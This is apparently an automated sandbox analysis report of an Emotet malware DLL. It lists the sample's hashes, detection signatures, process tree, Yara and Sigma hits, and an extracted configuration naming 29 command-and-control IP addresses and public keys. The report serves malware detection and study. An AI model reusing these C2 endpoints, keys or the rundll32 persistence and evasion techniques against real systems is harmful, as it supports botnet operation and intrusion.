Play interactive tour

Edit tour

Windows Analysis Report snBYiBAMB2

Overview

General Information

Sample Name:	snBYiBAMB2 (renamed file extension from none to dll)
Analysis ID:	532249
MD5:	4bd80b1d18138b1808925ddb69991001
SHA1:	2a78af27a95639c1095e4f8a411a8efb9c861abc
SHA256:	32f1f59b8c52019d2a946ddff1996e13fbadac1ed518278a281267f440ea3ea4
Tags:	32dllexe
Infos:
Most interesting Screenshot:

Detection

Emotet

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected Emotet

Sigma detected: Emotet RunDLL32 Process Creation

Changes security center settings (notifications, updates, antivirus, firewall)

Tries to detect virtualization through RDTSC time measurements

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Uses 32bit PE files

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Deletes files inside the Windows folder

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Abnormal high CPU Usage

AV process strings found (often used to terminate AV products)

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

Tries to load missing DLLs

Contains functionality to read the PEB

Drops PE files to the windows directory (C:\Windows)

Connects to several IPs in different countries

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 4348 cmdline: loaddll32.exe "C:\Users\user\Desktop\snBYiBAMB2.dll" MD5: 72FCD8FB0ADC38ED9050569AD673650E)

cmd.exe (PID: 6596 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\snBYiBAMB2.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 6628 cmdline: rundll32.exe "C:\Users\user\Desktop\snBYiBAMB2.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6120 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\snBYiBAMB2.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6560 cmdline: rundll32.exe C:\Users\user\Desktop\snBYiBAMB2.dll,Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 5116 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gcdru\wqnupsxlnfqvhei.gop",rRrsbNdtBW MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 4104 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Gcdru\wqnupsxlnfqvhei.gop",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 5744 cmdline: rundll32.exe C:\Users\user\Desktop\snBYiBAMB2.dll,awrrqyparpkpycx MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6132 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\snBYiBAMB2.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 5976 cmdline: rundll32.exe C:\Users\user\Desktop\snBYiBAMB2.dll,bcnxvrdkfysosxtof MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 5984 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\snBYiBAMB2.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 1896 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\snBYiBAMB2.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

svchost.exe (PID: 6644 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6768 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5092 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

SgrmBroker.exe (PID: 7076 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)

svchost.exe (PID: 4360 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

MpCmdRun.exe (PID: 4548 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)

conhost.exe (PID: 4544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

svchost.exe (PID: 1356 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5340 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 2584 cmdline: C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 400 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["46.55.222.11:443", "104.245.52.73:8080", "41.76.108.46:8080", "103.8.26.103:8080", "185.184.25.237:8080", "103.8.26.102:8080", "203.114.109.124:443", "45.118.115.99:8080", "178.79.147.66:8080", "58.227.42.236:80", "45.118.135.203:7080", "103.75.201.2:443", "195.154.133.20:443", "45.142.114.231:8080", "212.237.5.209:443", "207.38.84.195:8080", "104.251.214.46:8080", "212.237.17.99:8080", "212.237.56.116:7080", "216.158.226.206:443", "110.232.117.186:8080", "158.69.222.101:443", "107.182.225.142:8080", "176.104.106.96:8080", "81.0.236.90:443", "50.116.54.215:443", "138.185.72.26:8080", "51.68.175.8:8080", "210.57.217.132:8080"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
0000000F.00000002.753889449.0000000002DB5000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000001.00000002.622227585.0000000000E90000.00000040.00000010.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000001.00000002.622259831.0000000000EFC000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.582748176.0000000000675000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000F.00000002.754640431.0000000004700000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000007.00000002.604540735.0000000000AAA000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.585390946.0000000002F10000.00000040.00000010.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000002.622753667.0000000002DEA000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000007.00000002.604509096.0000000000990000.00000040.00000010.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.585330942.0000000002E36000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.582699855.0000000000400000.00000040.00000010.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000002.622693429.0000000002CB0000.00000040.00000010.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author
7.2.rundll32.exe.ac4248.1.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.2e041f0.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.2cb0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.400000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
7.2.rundll32.exe.990000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
7.2.rundll32.exe.990000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.400000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
7.2.rundll32.exe.ac4248.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.2f10000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.2cb0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
1.2.loaddll32.exe.f0e3f0.1.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
1.2.loaddll32.exe.f0e3f0.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
1.2.loaddll32.exe.e90000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.4700000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
1.2.loaddll32.exe.e90000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.4700000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.2f10000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.2e041f0.1.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 13 entries

Sigma Overview

System Summary:

Sigma detected: Emotet RunDLL32 Process Creation

Show sources

Source: Process started

Author: FPT.EagleEye: Data: Command: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Gcdru\wqnupsxlnfqvhei.gop",Control_RunDLL, CommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Gcdru\wqnupsxlnfqvhei.gop",Control_RunDLL, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gcdru\wqnupsxlnfqvhei.gop",rRrsbNdtBW, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 5116, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Gcdru\wqnupsxlnfqvhei.gop",Control_RunDLL, ProcessId: 4104

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 1.2.loaddll32.exe.f0e3f0.1.raw.unpack

Malware Configuration Extractor: Emotet {"C2 list": ["46.55.222.11:443", "104.245.52.73:8080", "41.76.108.46:8080", "103.8.26.103:8080", "185.184.25.237:8080", "103.8.26.102:8080", "203.114.109.124:443", "45.118.115.99:8080", "178.79.147.66:8080", "58.227.42.236:80", "45.118.135.203:7080", "103.75.201.2:443", "195.154.133.20:443", "45.142.114.231:8080", "212.237.5.209:443", "207.38.84.195:8080", "104.251.214.46:8080", "212.237.17.99:8080", "212.237.56.116:7080", "216.158.226.206:443", "110.232.117.186:8080", "158.69.222.101:443", "107.182.225.142:8080", "176.104.106.96:8080", "81.0.236.90:443", "50.116.54.215:443", "138.185.72.26:8080", "51.68.175.8:8080", "210.57.217.132:8080"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}

Multi AV Scanner detection for submitted file

Show sources

Source: snBYiBAMB2.dll

Virustotal: Detection: 24%

Perma Link

Source: snBYiBAMB2.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: snBYiBAMB2.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6EA2BA20 FindFirstFileExW,		1_2_6EA2BA20
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6EA2BA20 FindFirstFileExW,		4_2_6EA2BA20

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 46.55.222.11:443
Source: Malware configuration extractor	IPs: 104.245.52.73:8080
Source: Malware configuration extractor	IPs: 41.76.108.46:8080
Source: Malware configuration extractor	IPs: 103.8.26.103:8080
Source: Malware configuration extractor	IPs: 185.184.25.237:8080
Source: Malware configuration extractor	IPs: 103.8.26.102:8080
Source: Malware configuration extractor	IPs: 203.114.109.124:443
Source: Malware configuration extractor	IPs: 45.118.115.99:8080
Source: Malware configuration extractor	IPs: 178.79.147.66:8080
Source: Malware configuration extractor	IPs: 58.227.42.236:80
Source: Malware configuration extractor	IPs: 45.118.135.203:7080
Source: Malware configuration extractor	IPs: 103.75.201.2:443
Source: Malware configuration extractor	IPs: 195.154.133.20:443
Source: Malware configuration extractor	IPs: 45.142.114.231:8080
Source: Malware configuration extractor	IPs: 212.237.5.209:443
Source: Malware configuration extractor	IPs: 207.38.84.195:8080
Source: Malware configuration extractor	IPs: 104.251.214.46:8080
Source: Malware configuration extractor	IPs: 212.237.17.99:8080
Source: Malware configuration extractor	IPs: 212.237.56.116:7080
Source: Malware configuration extractor	IPs: 216.158.226.206:443
Source: Malware configuration extractor	IPs: 110.232.117.186:8080
Source: Malware configuration extractor	IPs: 158.69.222.101:443
Source: Malware configuration extractor	IPs: 107.182.225.142:8080
Source: Malware configuration extractor	IPs: 176.104.106.96:8080
Source: Malware configuration extractor	IPs: 81.0.236.90:443
Source: Malware configuration extractor	IPs: 50.116.54.215:443
Source: Malware configuration extractor	IPs: 138.185.72.26:8080
Source: Malware configuration extractor	IPs: 51.68.175.8:8080
Source: Malware configuration extractor	IPs: 210.57.217.132:8080

Source: Joe Sandbox View	ASN Name: OnlineSASFR OnlineSASFR
Source: Joe Sandbox View	ASN Name: ARUBA-ASNIT ARUBA-ASNIT
Source: Joe Sandbox View	ASN Name: RACKCORP-APRackCorpAU RACKCORP-APRackCorpAU

Source: Joe Sandbox View	IP Address: 195.154.133.20 195.154.133.20
Source: Joe Sandbox View	IP Address: 212.237.17.99 212.237.17.99

Source: unknown

Network traffic detected: IP country count 18

Source: svchost.exe, 0000000A.00000002.439435350.000002A54E413000.00000004.00000001.sdmp	String found in binary or memory: http://www.bingmapsportal.com
Source: svchost.exe, 00000006.00000002.799830333.0000027046841000.00000004.00000001.sdmp	String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000006.00000002.799830333.0000027046841000.00000004.00000001.sdmp	String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 00000006.00000002.799830333.0000027046841000.00000004.00000001.sdmp	String found in binary or memory: https://%s.xboxlive.combled
Source: svchost.exe, 00000006.00000002.799830333.0000027046841000.00000004.00000001.sdmp	String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 0000000A.00000003.412039378.000002A54E462000.00000004.00000001.sdmp	String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 00000006.00000002.799830333.0000027046841000.00000004.00000001.sdmp	String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000006.00000002.799830333.0000027046841000.00000004.00000001.sdmp	String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 0000000A.00000003.414059377.000002A54E45D000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000A.00000002.454072150.000002A54E459000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.414071596.000002A54E455000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000A.00000003.412039378.000002A54E462000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 0000000A.00000002.444157014.000002A54E429000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 0000000A.00000002.454072150.000002A54E459000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.414071596.000002A54E455000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
Source: svchost.exe, 0000000A.00000003.410874299.000002A54E468000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.459059998.000002A54E46A000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
Source: svchost.exe, 0000000A.00000003.412039378.000002A54E462000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 0000000A.00000003.414087604.000002A54E445000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.449956261.000002A54E44C000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 0000000A.00000002.454072150.000002A54E459000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.414071596.000002A54E455000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000A.00000002.444157014.000002A54E429000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 0000000A.00000003.412039378.000002A54E462000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 0000000A.00000003.412039378.000002A54E462000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 0000000A.00000003.412039378.000002A54E462000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 0000000A.00000003.366439224.000002A54E434000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
Source: svchost.exe, 0000000A.00000003.412843267.000002A54E45F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.457686821.000002A54E460000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 0000000A.00000002.444157014.000002A54E429000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 0000000A.00000003.412039378.000002A54E462000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 0000000A.00000002.454072150.000002A54E459000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.448544315.000002A54E440000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.414071596.000002A54E455000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 0000000A.00000003.414059377.000002A54E45D000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000A.00000003.414071596.000002A54E455000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000A.00000002.454072150.000002A54E459000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.414071596.000002A54E455000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000A.00000003.414071596.000002A54E455000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t
Source: svchost.exe, 0000000A.00000003.412039378.000002A54E462000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 0000000A.00000003.366439224.000002A54E434000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.444157014.000002A54E429000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000A.00000002.447740433.000002A54E43D000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.366439224.000002A54E434000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 0000000A.00000002.448544315.000002A54E440000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 0000000A.00000002.444157014.000002A54E429000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000A.00000003.366439224.000002A54E434000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000A.00000003.366439224.000002A54E434000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000A.00000003.366439224.000002A54E434000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 0000000A.00000002.447740433.000002A54E43D000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.366439224.000002A54E434000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 0000000A.00000003.414087604.000002A54E445000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.449956261.000002A54E44C000.00000004.00000001.sdmp	String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen

E-Banking Fraud:

Yara detected Emotet

Show sources

Source: Yara match	File source: 7.2.rundll32.exe.ac4248.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.2e041f0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.2cb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.990000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.990000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.ac4248.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.2f10000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.2cb0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.f0e3f0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.f0e3f0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.e90000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.4700000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.e90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.4700000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.2f10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.2e041f0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.753889449.0000000002DB5000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.622227585.0000000000E90000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.622259831.0000000000EFC000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.582748176.0000000000675000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.754640431.0000000004700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.604540735.0000000000AAA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.585390946.0000000002F10000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.622753667.0000000002DEA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.604509096.0000000000990000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.585330942.0000000002E36000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.582699855.0000000000400000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.622693429.0000000002CB0000.00000040.00000010.sdmp, type: MEMORY

System Summary:

Source: snBYiBAMB2.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Windows\SysWOW64\rundll32.exe

File deleted: C:\Windows\SysWOW64\Gcdru\wqnupsxlnfqvhei.gop:Zone.Identifier

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Gcdru\

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6EA057C0	1_2_6EA057C0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6EA062C0	1_2_6EA062C0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6EA2AE28	1_2_6EA2AE28
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6EA31F65	1_2_6EA31F65
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6EA12C70	1_2_6EA12C70
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6EA1FD1F	1_2_6EA1FD1F
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6EA21D50	1_2_6EA21D50
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6EA02B50	1_2_6EA02B50
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6EA358EF	1_2_6EA358EF
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6EA0E6B0	1_2_6EA0E6B0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6EA357CB	1_2_6EA357CB
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6EA30569	1_2_6EA30569
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6EA09380	1_2_6EA09380
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6EA1C366	1_2_6EA1C366
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6EA340B7	1_2_6EA340B7
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6EA1C132	1_2_6EA1C132
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02F306EF	4_2_02F306EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02F1AEB9	4_2_02F1AEB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02F256A9	4_2_02F256A9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02F1F699	4_2_02F1F699
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02F2604E	4_2_02F2604E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02F2BA18	4_2_02F2BA18
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02F291F7	4_2_02F291F7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02F2E7DA	4_2_02F2E7DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02F289DA	4_2_02F289DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02F2ED95	4_2_02F2ED95
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02F12B7C	4_2_02F12B7C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02F1196D	4_2_02F1196D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02F18D59	4_2_02F18D59
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02F23130	4_2_02F23130
